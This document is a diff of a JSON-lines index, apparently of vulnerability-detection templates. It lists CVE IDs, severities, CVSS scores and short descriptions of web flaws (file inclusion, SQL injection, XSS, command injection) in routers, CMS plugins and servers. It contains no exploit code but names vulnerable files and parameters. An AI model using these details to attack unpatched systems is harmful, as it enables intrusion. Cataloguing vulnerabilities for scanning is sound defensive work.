{"ID":"CVE-2011-4640","Info":{"Name":"WebTitan \u003c 3.60 - Local File Inclusion","Severity":"medium","Description":"Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.\n","Classification":{"CVSSScore":"4.0"}},"file_path":"http/cves/2011/CVE-2011-4640.yaml"}
|
||||
{"ID":"CVE-2011-4640","Info":{"Name":"WebTitan \u003c 3.60 - Local File Inclusion","Severity":"medium","Description":"Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.\n","Classification":{"CVSSScore":"4"}},"file_path":"http/cves/2011/CVE-2011-4640.yaml"}
|
||||
{"ID":"CVE-2011-4804","Info":{"Name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-4804.yaml"}
|
||||
{"ID":"CVE-2011-4926","Info":{"Name":"Adminimize 1.7.22 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-4926.yaml"}
|
||||
{"ID":"CVE-2011-5106","Info":{"Name":"WordPress Plugin Flexible Custom Post Type \u003c 0.1.7 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-5106.yaml"}
|
||||
|
@ -265,7 +265,7 @@
|
|||
{"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"}
|
||||
{"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"}
|
||||
{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"}
|
||||
{"ID":"CVE-2015-1635","Info":{"Name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","Severity":"critical","Description":"HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2015/CVE-2015-1635.yaml"}
|
||||
{"ID":"CVE-2015-1635","Info":{"Name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","Severity":"critical","Description":"HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2015/CVE-2015-1635.yaml"}
|
||||
{"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"}
|
||||
{"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"}
|
||||
{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"}
|
||||
|
@ -361,6 +361,7 @@
|
|||
{"ID":"CVE-2016-4975","Info":{"Name":"Apache mod_userdir CRLF injection","Severity":"medium","Description":"Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-4975.yaml"}
|
||||
{"ID":"CVE-2016-4977","Info":{"Name":"Spring Security OAuth2 Remote Command Execution","Severity":"high","Description":"Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-4977.yaml"}
|
||||
{"ID":"CVE-2016-5649","Info":{"Name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","Severity":"critical","Description":"NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-5649.yaml"}
|
||||
{"ID":"CVE-2016-5674","Info":{"Name":"NUUO NVR camera `debugging_center_utils_.php` - Command Execution","Severity":"critical","Description":"__debugging_center_utils___.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-5674.yaml"}
|
||||
{"ID":"CVE-2016-6195","Info":{"Name":"vBulletin \u003c= 4.2.3 - SQL Injection","Severity":"critical","Description":"vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-6195.yaml"}
|
||||
{"ID":"CVE-2016-6277","Info":{"Name":"NETGEAR Routers - Remote Code Execution","Severity":"high","Description":"NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-6277.yaml"}
|
||||
{"ID":"CVE-2016-6601","Info":{"Name":"ZOHO WebNMS Framework \u003c5.2 SP1 - Local File Inclusion","Severity":"high","Description":"ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2016/CVE-2016-6601.yaml"}
|
||||
|
@ -491,6 +492,10 @@
|
|||
{"ID":"CVE-2018-10201","Info":{"Name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","Severity":"high","Description":"Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-10201.yaml"}
|
||||
{"ID":"CVE-2018-10230","Info":{"Name":"Zend Server \u003c9.13 - Cross-Site Scripting","Severity":"medium","Description":"Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-10230.yaml"}
|
||||
{"ID":"CVE-2018-10562","Info":{"Name":"Dasan GPON Devices - Remote Code Execution","Severity":"critical","Description":"Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-10562.yaml"}
|
||||
{"ID":"CVE-2018-10735","Info":{"Name":"NagiosXI \u003c= 5.4.12 `commandline.php` SQL injection","Severity":"high","Description":"A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/commandline.php cname parameter.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2018/CVE-2018-10735.yaml"}
|
||||
{"ID":"CVE-2018-10736","Info":{"Name":"NagiosXI \u003c= 5.4.12 - SQL injection","Severity":"high","Description":"A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/info.php key1 parameter.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2018/CVE-2018-10736.yaml"}
|
||||
{"ID":"CVE-2018-10737","Info":{"Name":"NagiosXI \u003c= 5.4.12 logbook.php SQL injection","Severity":"high","Description":"A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/logbook.php txtSearch parameter.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2018/CVE-2018-10737.yaml"}
|
||||
{"ID":"CVE-2018-10738","Info":{"Name":"NagiosXI \u003c= 5.4.12 menuaccess.php - SQL injection","Severity":"high","Description":"A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/menuaccess.php chbKey1 parameter.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2018/CVE-2018-10738.yaml"}
|
||||
{"ID":"CVE-2018-10818","Info":{"Name":"LG NAS Devices - Remote Code Execution","Severity":"critical","Description":"LG NAS devices contain a pre-auth remote command injection via the \"password\" parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2018/CVE-2018-10818.yaml"}
|
||||
{"ID":"CVE-2018-10822","Info":{"Name":"D-Link Routers - Local File Inclusion","Severity":"high","Description":"D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after \"GET /uir\" in an HTTP request to the web interface.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-10822.yaml"}
|
||||
{"ID":"CVE-2018-10823","Info":{"Name":"D-Link Routers - Remote Command Injection","Severity":"high","Description":"D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2018/CVE-2018-10823.yaml"}
|
||||
|
@ -610,9 +615,11 @@
|
|||
{"ID":"CVE-2018-6184","Info":{"Name":"Zeit Next.js \u003c4.2.3 - Local File Inclusion","Severity":"high","Description":"Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6184.yaml"}
|
||||
{"ID":"CVE-2018-6200","Info":{"Name":"vBulletin - Open Redirect","Severity":"medium","Description":"vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-6200.yaml"}
|
||||
{"ID":"CVE-2018-6530","Info":{"Name":"D-Link - Unauthenticated Remote Code Execution","Severity":"critical","Description":"OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6530.yaml"}
|
||||
{"ID":"CVE-2018-6605","Info":{"Name":"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6605.yaml"}
|
||||
{"ID":"CVE-2018-6910","Info":{"Name":"DedeCMS 5.7 - Path Disclosure","Severity":"high","Description":"DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6910.yaml"}
|
||||
{"ID":"CVE-2018-7251","Info":{"Name":"Anchor CMS 0.12.3 - Error Log Exposure","Severity":"critical","Description":"Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7251.yaml"}
|
||||
{"ID":"CVE-2018-7282","Info":{"Name":"TITool PrintMonitor - Blind SQL Injection","Severity":"critical","Description":"The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7282.yaml"}
|
||||
{"ID":"CVE-2018-7314","Info":{"Name":"Joomla! Component PrayerCenter 3.0.2 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7314.yaml"}
|
||||
{"ID":"CVE-2018-7422","Info":{"Name":"WordPress Site Editor \u003c=1.1.1 - Local File Inclusion","Severity":"high","Description":"WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7422.yaml"}
|
||||
{"ID":"CVE-2018-7467","Info":{"Name":"AxxonSoft Axxon Next - Local File Inclusion","Severity":"high","Description":"AxxonSoft Axxon Next suffers from a local file inclusion vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7467.yaml"}
|
||||
{"ID":"CVE-2018-7490","Info":{"Name":"uWSGI PHP Plugin Local File Inclusion","Severity":"high","Description":"uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7490.yaml"}
|
||||
|
@ -788,6 +795,7 @@
|
|||
{"ID":"CVE-2019-8982","Info":{"Name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent\u0026inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery.","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2019/CVE-2019-8982.yaml"}
|
||||
{"ID":"CVE-2019-9041","Info":{"Name":"ZZZCMS 1.6.1 - Remote Code Execution","Severity":"high","Description":"ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2019/CVE-2019-9041.yaml"}
|
||||
{"ID":"CVE-2019-9618","Info":{"Name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","Severity":"critical","Description":"WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-9618.yaml"}
|
||||
{"ID":"CVE-2019-9632","Info":{"Name":"ESAFENET CDG - Arbitrary File Download","Severity":"high","Description":"ESAFENET CDG V3 and V5 has an arbitrary file download vulnerability via the fileName parameter in download.jsp because the InstallationPack parameter is mishandled in a /CDGServer3/ClientAjax request.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-9632.yaml"}
|
||||
{"ID":"CVE-2019-9670","Info":{"Name":"Synacor Zimbra Collaboration \u003c8.7.11p10 - XML External Entity Injection","Severity":"critical","Description":"Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-9670.yaml"}
|
||||
{"ID":"CVE-2019-9726","Info":{"Name":"Homematic CCU3 - Local File Inclusion","Severity":"high","Description":"eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-9726.yaml"}
|
||||
{"ID":"CVE-2019-9733","Info":{"Name":"JFrog Artifactory 6.7.3 - Admin Login Bypass","Severity":"critical","Description":"JFrog Artifactory 6.7.3 is vulnerable to an admin login bypass issue because by default the access-admin account is used to reset the password of the admin account. While this is only allowable from a connection directly from localhost, providing an X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-9733.yaml"}
|
||||
|
@ -1409,7 +1417,7 @@
|
|||
{"ID":"CVE-2021-41174","Info":{"Name":"Grafana 8.0.0 \u003c= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","Severity":"medium","Description":"Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-41174.yaml"}
|
||||
{"ID":"CVE-2021-41192","Info":{"Name":"Redash Setup Configuration - Default Secrets Disclosure","Severity":"medium","Description":"Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions \u003c=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-41192.yaml"}
|
||||
{"ID":"CVE-2021-41266","Info":{"Name":"MinIO Operator Console Authentication Bypass","Severity":"critical","Description":"MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-41266.yaml"}
|
||||
{"ID":"CVE-2021-41277","Info":{"Name":"Metabase Local File Inclusion","Severity":"high","Description":"Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin-\u003esettings-\u003emaps-\u003ecustom maps-\u003eadd a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41277.yaml"}
|
||||
{"ID":"CVE-2021-41277","Info":{"Name":"Metabase - Local File Inclusion","Severity":"high","Description":"Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin-\u003esettings-\u003emaps-\u003ecustom maps-\u003eadd a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41277.yaml"}
|
||||
{"ID":"CVE-2021-41282","Info":{"Name":"pfSense - Arbitrary File Write","Severity":"high","Description":"diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-41282.yaml"}
|
||||
{"ID":"CVE-2021-41291","Info":{"Name":"ECOA Building Automation System - Directory Traversal Content Disclosure","Severity":"high","Description":"The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41291.yaml"}
|
||||
{"ID":"CVE-2021-41293","Info":{"Name":"ECOA Building Automation System - Arbitrary File Retrieval","Severity":"high","Description":"The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41293.yaml"}
|
||||
|
@ -1488,6 +1496,8 @@
|
|||
{"ID":"CVE-2021-46381","Info":{"Name":"D-Link DAP-1620 - Local File Inclusion","Severity":"high","Description":"D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-46381.yaml"}
|
||||
{"ID":"CVE-2021-46387","Info":{"Name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","Severity":"medium","Description":"ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-46387.yaml"}
|
||||
{"ID":"CVE-2021-46417","Info":{"Name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","Severity":"high","Description":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-46417.yaml"}
|
||||
{"ID":"CVE-2021-46418","Info":{"Name":"Telesquare TLR-2855KS6 - Arbitrary File Creation","Severity":"high","Description":"An unauthorized file creation vulnerability in Telesquare TLR-2855KS6 via PUT method can allow creation of CGI scripts.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-46418.yaml"}
|
||||
{"ID":"CVE-2021-46419","Info":{"Name":"Telesquare TLR-2855KS6 - Arbitrary File Deletion","Severity":"critical","Description":"An unauthorized file deletion vulnerability in Telesquare TLR-2855KS6 via DELETE method can allow deletion of system files and scripts.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-46419.yaml"}
|
||||
{"ID":"CVE-2021-46422","Info":{"Name":"SDT-CW3B1 1.1.0 - OS Command Injection","Severity":"critical","Description":"Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46422.yaml"}
|
||||
{"ID":"CVE-2021-46424","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","Severity":"critical","Description":"Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-46424.yaml"}
|
||||
{"ID":"CVE-2021-46704","Info":{"Name":"GenieACS =\u003e 1.2.8 - OS Command Injection","Severity":"critical","Description":"In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46704.yaml"}
|
||||
|
@ -1597,7 +1607,7 @@
|
|||
{"ID":"CVE-2022-1595","Info":{"Name":"WordPress HC Custom WP-Admin URL \u003c=1.4 - Admin Login URL Disclosure","Severity":"medium","Description":"WordPress HC Custom WP-Admin URL plugin through 1.4 leaks the secret login URL when sending a specially crafted request, thereby allowing an attacker to discover the administrative login URL.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1595.yaml"}
|
||||
{"ID":"CVE-2022-1597","Info":{"Name":"WordPress WPQA \u003c5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1597.yaml"}
|
||||
{"ID":"CVE-2022-1598","Info":{"Name":"WordPress WPQA \u003c5.5 - Improper Access Control","Severity":"medium","Description":"WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1598.yaml"}
|
||||
{"ID":"CVE-2022-1609","Info":{"Name":"The School Management \u003c 9.9.7 - Remote Code Execution","Severity":"critical","Description":"The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-1609.yaml"}
|
||||
{"ID":"CVE-2022-1609","Info":{"Name":"The School Management \u003c 9.9.7 - Remote Code Execution","Severity":"critical","Description":"The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-1609.yaml"}
|
||||
{"ID":"CVE-2022-1713","Info":{"Name":"Drawio \u003c18.0.4 - Server-Side Request Forgery","Severity":"high","Description":"Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-1713.yaml"}
|
||||
{"ID":"CVE-2022-1724","Info":{"Name":"WordPress Simple Membership \u003c4.1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Simple Membership plugin before 4.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape parameters before outputting them back in AJAX actions.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1724.yaml"}
|
||||
{"ID":"CVE-2022-1756","Info":{"Name":"Newsletter \u003c 7.4.5 - Cross-Site Scripting","Severity":"medium","Description":"The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1756.yaml"}
|
||||
|
@ -1706,7 +1716,7 @@
|
|||
